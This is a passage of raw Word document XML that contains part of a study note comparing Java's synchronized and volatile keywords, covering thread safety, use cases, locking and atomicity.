          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provide mutual exclusion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1D8BDC" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. Thread Safety:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518B5136" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1094"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B759BC" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1094"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Provides </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mutual exclusion</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. When a method or block is synchronized, only one thread can execute it at a time. It ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>atomicity</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the code block inside the synchronized method is executed completely without interruption).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFA6852" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1094"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8108A1" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1094"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Provides </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>visibility</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> but does not ensure mutual exclusion. A volatile variable ensures that changes to the variable are immediately visible to all threads. However, it does </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> guarantee atomicity for compound operations (like i++).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A34BF1D" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44947EF8" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1095"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD7DC38" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1095"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Used when you need to control access to a shared resource (like a method or block of code) to ensure that only one thread can modify it at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672807F0" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1095"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example use case: Implementing thread-safe counters or incrementing shared data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C579DA" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1095"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E056BF" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1095"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Used when you need to make sure that a variable's updated value is visible to all threads and avoid caching issues. It’s commonly used for flags or state variables that control thread execution (e.g., stopping threads).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506C99DA" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1095"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example use case: A flag variable that signals threads to stop execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7157306F" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. Locking and Synchronization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EA1646" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1096"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07655054" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1096"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lock</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure mutual exclusion. When a thread enters a synchronized block or method, it locks the object (or class) and prevents other threads from entering the synchronized code until the lock is released.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C75246" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1096"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAC2443" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1096"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Does </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not use locks</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It simply ensures that the latest value of a variable is visible to all threads without synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF82091" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5. Atomicity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0628D3" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1097"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705911CC" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1097"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Guarantees </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>atomicity</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of code inside the synchronized block. It ensures that the code is executed completely without interruption by other threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240CB5B9" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1097"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A4425E" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1097"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Does not guarantee atomicity</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for compound actions (like i++, which involves reading, modifying, and writing the value). It only guarantees that the variable’s value is updated in memory and visible to other threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3692C08E" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6. Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F1C81A" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1098"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
